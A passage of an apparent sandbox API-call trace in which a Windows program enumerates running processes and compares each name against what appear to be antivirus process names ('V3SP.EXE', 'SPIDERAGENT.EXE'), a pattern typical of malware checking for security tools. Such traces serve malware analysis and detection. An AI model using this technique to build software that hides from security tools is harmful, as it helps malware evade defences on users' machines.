(lpString1="ABC.EXE", lpString2="V3SP.EXE") returned -1 [0163.383] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="previous_automation_previously.exe")) returned 1 [0163.384] lstrcpyW (in: lpString1=0x18f6dc, lpString2="previous_automation_previously.exe" | out: lpString1="previous_automation_previously.exe") returned="previous_automation_previously.exe" [0163.384] lstrlenW (lpString="previous_automation_previously.exe") returned 34 [0163.384] CharUpperBuffW (in: lpsz="previous_automation_previously.exe", cchLength=0x22 | out: lpsz="PREVIOUS_AUTOMATION_PREVIOUSLY.EXE") returned 0x22 [0163.384] lstrcmpW (lpString1="PREVIOUS_AUTOMATION_PREVIOUSLY.EXE", lpString2="V3SP.EXE") returned -1 [0163.384] 
Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="english_performing.exe")) returned 1 [0163.385] lstrcpyW (in: lpString1=0x18f6dc, lpString2="english_performing.exe" | out: lpString1="english_performing.exe") returned="english_performing.exe" [0163.385] lstrlenW (lpString="english_performing.exe") returned 22 [0163.385] CharUpperBuffW (in: lpsz="english_performing.exe", cchLength=0x16 | out: lpsz="ENGLISH_PERFORMING.EXE") returned 0x16 [0163.385] lstrcmpW (lpString1="ENGLISH_PERFORMING.EXE", lpString2="V3SP.EXE") returned -1 [0163.385] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="laptop-tattoo.exe")) returned 1 [0163.385] lstrcpyW (in: lpString1=0x18f6dc, lpString2="laptop-tattoo.exe" | out: lpString1="laptop-tattoo.exe") returned="laptop-tattoo.exe" [0163.385] lstrlenW (lpString="laptop-tattoo.exe") returned 17 [0163.385] CharUpperBuffW (in: lpsz="laptop-tattoo.exe", cchLength=0x11 | out: lpsz="LAPTOP-TATTOO.EXE") returned 0x11 [0163.385] lstrcmpW (lpString1="LAPTOP-TATTOO.EXE", lpString2="V3SP.EXE") returned -1 [0163.385] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="c-weird-baskets.exe")) returned 1 [0163.386] lstrcpyW (in: lpString1=0x18f6dc, lpString2="c-weird-baskets.exe" | out: lpString1="c-weird-baskets.exe") returned="c-weird-baskets.exe" [0163.386] lstrlenW (lpString="c-weird-baskets.exe") returned 19 [0163.386] CharUpperBuffW (in: lpsz="c-weird-baskets.exe", 
cchLength=0x13 | out: lpsz="C-WEIRD-BASKETS.EXE") returned 0x13 [0163.386] lstrcmpW (lpString1="C-WEIRD-BASKETS.EXE", lpString2="V3SP.EXE") returned -1 [0163.386] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="volume.exe")) returned 1 [0163.387] lstrcpyW (in: lpString1=0x18f6dc, lpString2="volume.exe" | out: lpString1="volume.exe") returned="volume.exe" [0163.387] lstrlenW (lpString="volume.exe") returned 10 [0163.387] CharUpperBuffW (in: lpsz="volume.exe", cchLength=0xa | out: lpsz="VOLUME.EXE") returned 0xa [0163.387] lstrcmpW (lpString1="VOLUME.EXE", lpString2="V3SP.EXE") returned 1 [0163.387] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x570, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="rich-zealand.exe")) returned 1 [0163.388] lstrcpyW (in: lpString1=0x18f6dc, lpString2="rich-zealand.exe" | out: lpString1="rich-zealand.exe") returned="rich-zealand.exe" [0163.388] lstrlenW (lpString="rich-zealand.exe") returned 16 [0163.388] CharUpperBuffW (in: lpsz="rich-zealand.exe", cchLength=0x10 | out: lpsz="RICH-ZEALAND.EXE") returned 0x10 [0163.388] lstrcmpW (lpString1="RICH-ZEALAND.EXE", lpString2="V3SP.EXE") returned -1 [0163.388] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="objectives-bailey-audit.exe")) returned 1 [0163.388] lstrcpyW (in: lpString1=0x18f6dc, lpString2="objectives-bailey-audit.exe" | out: lpString1="objectives-bailey-audit.exe") returned="objectives-bailey-audit.exe" [0163.388] lstrlenW 
(lpString="objectives-bailey-audit.exe") returned 27 [0163.388] CharUpperBuffW (in: lpsz="objectives-bailey-audit.exe", cchLength=0x1b | out: lpsz="OBJECTIVES-BAILEY-AUDIT.EXE") returned 0x1b [0163.388] lstrcmpW (lpString1="OBJECTIVES-BAILEY-AUDIT.EXE", lpString2="V3SP.EXE") returned -1 [0163.388] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="puzzle-fcc-tuesday.exe")) returned 1 [0163.389] lstrcpyW (in: lpString1=0x18f6dc, lpString2="puzzle-fcc-tuesday.exe" | out: lpString1="puzzle-fcc-tuesday.exe") returned="puzzle-fcc-tuesday.exe" [0163.389] lstrlenW (lpString="puzzle-fcc-tuesday.exe") returned 22 [0163.389] CharUpperBuffW (in: lpsz="puzzle-fcc-tuesday.exe", cchLength=0x16 | out: lpsz="PUZZLE-FCC-TUESDAY.EXE") returned 0x16 [0163.389] lstrcmpW (lpString1="PUZZLE-FCC-TUESDAY.EXE", lpString2="V3SP.EXE") returned -1 [0163.389] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x690, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="sayconvenience.exe")) returned 1 [0163.390] lstrcpyW (in: lpString1=0x18f6dc, lpString2="sayconvenience.exe" | out: lpString1="sayconvenience.exe") returned="sayconvenience.exe" [0163.390] lstrlenW (lpString="sayconvenience.exe") returned 18 [0163.390] CharUpperBuffW (in: lpsz="sayconvenience.exe", cchLength=0x12 | out: lpsz="SAYCONVENIENCE.EXE") returned 0x12 [0163.391] lstrcmpW (lpString1="SAYCONVENIENCE.EXE", lpString2="V3SP.EXE") returned -1 [0163.391] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="psychology-leaving-examinations.exe")) returned 1 [0163.392] lstrcpyW (in: lpString1=0x18f6dc, lpString2="psychology-leaving-examinations.exe" | out: lpString1="psychology-leaving-examinations.exe") returned="psychology-leaving-examinations.exe" [0163.392] lstrlenW (lpString="psychology-leaving-examinations.exe") returned 35 [0163.392] CharUpperBuffW (in: lpsz="psychology-leaving-examinations.exe", cchLength=0x23 | out: lpsz="PSYCHOLOGY-LEAVING-EXAMINATIONS.EXE") returned 0x23 [0163.392] lstrcmpW (lpString1="PSYCHOLOGY-LEAVING-EXAMINATIONS.EXE", lpString2="V3SP.EXE") returned -1 [0163.392] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x680, pcPriClassBase=8, dwFlags=0x0, szExeFile="EXCEL.EXE")) returned 1 [0163.392] lstrcpyW (in: lpString1=0x18f6dc, lpString2="EXCEL.EXE" | out: lpString1="EXCEL.EXE") returned="EXCEL.EXE" [0163.393] lstrlenW (lpString="EXCEL.EXE") returned 9 [0163.393] CharUpperBuffW (in: lpsz="EXCEL.EXE", cchLength=0x9 | out: lpsz="EXCEL.EXE") returned 0x9 [0163.393] lstrcmpW (lpString1="EXCEL.EXE", lpString2="V3SP.EXE") returned -1 [0163.393] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.393] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.393] lstrlenW (lpString="svchost.exe") returned 11 [0163.393] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.393] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3SP.EXE") returned -1 [0163.393] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, 
th32ProcessID=0x9f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0163.394] lstrcpyW (in: lpString1=0x18f6dc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0163.394] lstrlenW (lpString="sppsvc.exe") returned 10 [0163.394] CharUpperBuffW (in: lpsz="sppsvc.exe", cchLength=0xa | out: lpsz="SPPSVC.EXE") returned 0xa [0163.394] lstrcmpW (lpString1="SPPSVC.EXE", lpString2="V3SP.EXE") returned -1 [0163.394] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OSPPSVC.EXE")) returned 1 [0163.395] lstrcpyW (in: lpString1=0x18f6dc, lpString2="OSPPSVC.EXE" | out: lpString1="OSPPSVC.EXE") returned="OSPPSVC.EXE" [0163.395] lstrlenW (lpString="OSPPSVC.EXE") returned 11 [0163.395] CharUpperBuffW (in: lpsz="OSPPSVC.EXE", cchLength=0xb | out: lpsz="OSPPSVC.EXE") returned 0xb [0163.395] lstrcmpW (lpString1="OSPPSVC.EXE", lpString2="V3SP.EXE") returned -1 [0163.395] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.396] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.396] lstrlenW (lpString="svchost.exe") returned 11 [0163.396] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.396] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3SP.EXE") returned -1 [0163.396] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, 
th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.396] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.396] lstrlenW (lpString="svchost.exe") returned 11 [0163.396] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.396] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="V3SP.EXE") returned -1 [0163.396] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x890, pcPriClassBase=8, dwFlags=0x0, szExeFile="winpoint.exe")) returned 1 [0163.397] lstrcpyW (in: lpString1=0x18f6dc, lpString2="winpoint.exe" | out: lpString1="winpoint.exe") returned="winpoint.exe" [0163.397] lstrlenW (lpString="winpoint.exe") returned 12 [0163.397] CharUpperBuffW (in: lpsz="winpoint.exe", cchLength=0xc | out: lpsz="WINPOINT.EXE") returned 0xc [0163.397] lstrcmpW (lpString1="WINPOINT.EXE", lpString2="V3SP.EXE") returned 1 [0163.397] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x4c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0163.398] lstrcpyW (in: lpString1=0x18f6dc, lpString2="cmd.exe" | out: lpString1="cmd.exe") returned="cmd.exe" [0163.398] lstrlenW (lpString="cmd.exe") returned 7 [0163.398] CharUpperBuffW (in: lpsz="cmd.exe", cchLength=0x7 | out: lpsz="CMD.EXE") returned 0x7 [0163.398] lstrcmpW (lpString1="CMD.EXE", lpString2="V3SP.EXE") returned -1 [0163.398] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x188, 
pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0163.399] lstrcpyW (in: lpString1=0x18f6dc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0163.399] lstrlenW (lpString="conhost.exe") returned 11 [0163.399] CharUpperBuffW (in: lpsz="conhost.exe", cchLength=0xb | out: lpsz="CONHOST.EXE") returned 0xb [0163.399] lstrcmpW (lpString1="CONHOST.EXE", lpString2="V3SP.EXE") returned -1 [0163.399] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0163.399] lstrcpyW (in: lpString1=0x18f6dc, lpString2="PING.EXE" | out: lpString1="PING.EXE") returned="PING.EXE" [0163.399] lstrlenW (lpString="PING.EXE") returned 8 [0163.399] CharUpperBuffW (in: lpsz="PING.EXE", cchLength=0x8 | out: lpsz="PING.EXE") returned 0x8 [0163.399] lstrcmpW (lpString1="PING.EXE", lpString2="V3SP.EXE") returned -1 [0163.399] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xcc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 0 [0163.400] CloseHandle (hObject=0xe0) returned 1 [0163.400] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe0 [0163.402] lstrcpyW (in: lpString1=0x18f8e4, lpString2="SPIDERAGENT.EXE" | out: lpString1="SPIDERAGENT.EXE") returned="SPIDERAGENT.EXE" [0163.402] lstrlenW (lpString="SPIDERAGENT.EXE") returned 15 [0163.402] CharUpperBuffW (in: lpsz="SPIDERAGENT.EXE", cchLength=0xf | out: lpsz="SPIDERAGENT.EXE") returned 0xf [0163.402] Process32FirstW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, 
pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0163.403] lstrcpyW (in: lpString1=0x18f6dc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0163.403] lstrlenW (lpString="[System Process]") returned 16 [0163.403] CharUpperBuffW (in: lpsz="[System Process]", cchLength=0x10 | out: lpsz="[SYSTEM PROCESS]") returned 0x10 [0163.403] lstrcmpW (lpString1="[SYSTEM PROCESS]", lpString2="SPIDERAGENT.EXE") returned -1 [0163.403] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0163.403] lstrcpyW (in: lpString1=0x18f6dc, lpString2="System" | out: lpString1="System") returned="System" [0163.403] lstrlenW (lpString="System") returned 6 [0163.403] CharUpperBuffW (in: lpsz="System", cchLength=0x6 | out: lpsz="SYSTEM") returned 0x6 [0163.403] lstrcmpW (lpString1="SYSTEM", lpString2="SPIDERAGENT.EXE") returned 1 [0163.403] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0163.404] lstrcpyW (in: lpString1=0x18f6dc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0163.404] lstrlenW (lpString="smss.exe") returned 8 [0163.404] CharUpperBuffW (in: lpsz="smss.exe", cchLength=0x8 | out: lpsz="SMSS.EXE") returned 0x8 [0163.404] lstrcmpW (lpString1="SMSS.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.404] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) 
returned 1 [0163.405] lstrcpyW (in: lpString1=0x18f6dc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0163.405] lstrlenW (lpString="csrss.exe") returned 9 [0163.405] CharUpperBuffW (in: lpsz="csrss.exe", cchLength=0x9 | out: lpsz="CSRSS.EXE") returned 0x9 [0163.405] lstrcmpW (lpString1="CSRSS.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.405] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0163.405] lstrcpyW (in: lpString1=0x18f6dc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0163.405] lstrlenW (lpString="wininit.exe") returned 11 [0163.405] CharUpperBuffW (in: lpsz="wininit.exe", cchLength=0xb | out: lpsz="WININIT.EXE") returned 0xb [0163.406] lstrcmpW (lpString1="WININIT.EXE", lpString2="SPIDERAGENT.EXE") returned 1 [0163.406] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0163.406] lstrcpyW (in: lpString1=0x18f6dc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0163.406] lstrlenW (lpString="csrss.exe") returned 9 [0163.406] CharUpperBuffW (in: lpsz="csrss.exe", cchLength=0x9 | out: lpsz="CSRSS.EXE") returned 0x9 [0163.406] lstrcmpW (lpString1="CSRSS.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.406] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0163.407] lstrcpyW (in: lpString1=0x18f6dc, 
lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0163.407] lstrlenW (lpString="winlogon.exe") returned 12 [0163.407] CharUpperBuffW (in: lpsz="winlogon.exe", cchLength=0xc | out: lpsz="WINLOGON.EXE") returned 0xc [0163.407] lstrcmpW (lpString1="WINLOGON.EXE", lpString2="SPIDERAGENT.EXE") returned 1 [0163.407] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0163.408] lstrcpyW (in: lpString1=0x18f6dc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0163.408] lstrlenW (lpString="services.exe") returned 12 [0163.408] CharUpperBuffW (in: lpsz="services.exe", cchLength=0xc | out: lpsz="SERVICES.EXE") returned 0xc [0163.408] lstrcmpW (lpString1="SERVICES.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.408] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0163.408] lstrcpyW (in: lpString1=0x18f6dc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0163.408] lstrlenW (lpString="lsass.exe") returned 9 [0163.409] CharUpperBuffW (in: lpsz="lsass.exe", cchLength=0x9 | out: lpsz="LSASS.EXE") returned 0x9 [0163.409] lstrcmpW (lpString1="LSASS.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.409] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0163.409] lstrcpyW (in: lpString1=0x18f6dc, lpString2="lsm.exe" | out: 
lpString1="lsm.exe") returned="lsm.exe" [0163.409] lstrlenW (lpString="lsm.exe") returned 7 [0163.409] CharUpperBuffW (in: lpsz="lsm.exe", cchLength=0x7 | out: lpsz="LSM.EXE") returned 0x7 [0163.409] lstrcmpW (lpString1="LSM.EXE", lpString2="SPIDERAGENT.EXE") returned -1 [0163.409] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.410] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.410] lstrlenW (lpString="svchost.exe") returned 11 [0163.410] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.410] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="SPIDERAGENT.EXE") returned 1 [0163.410] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.411] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.411] lstrlenW (lpString="svchost.exe") returned 11 [0163.411] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.411] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="SPIDERAGENT.EXE") returned 1 [0163.411] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.411] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" 
[0163.411] lstrlenW (lpString="svchost.exe") returned 11 [0163.411] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.411] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="SPIDERAGENT.EXE") returned 1 [0163.411] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.412] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.412] lstrlenW (lpString="svchost.exe") returned 11 [0163.412] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.412] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="SPIDERAGENT.EXE") returned 1 [0163.412] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0163.413] lstrcpyW (in: lpString1=0x18f6dc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0163.413] lstrlenW (lpString="svchost.exe") returned 11 [0163.413] CharUpperBuffW (in: lpsz="svchost.exe", cchLength=0xb | out: lpsz="SVCHOST.EXE") returned 0xb [0163.413] lstrcmpW (lpString1="SVCHOST.EXE", lpString2="SPIDERAGENT.EXE") returned 1 [0163.413] Process32NextW (in: hSnapshot=0xe0, lppe=0x18f4b0 | out: lppe=0x18f4b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0163.414] lstrcpyW (in: lpString1=0x18f6dc, lpString2="audiodg.exe" | out: lpString1="audiodg.exe") returned="audiodg.exe" [0163.414] lstrlenW 
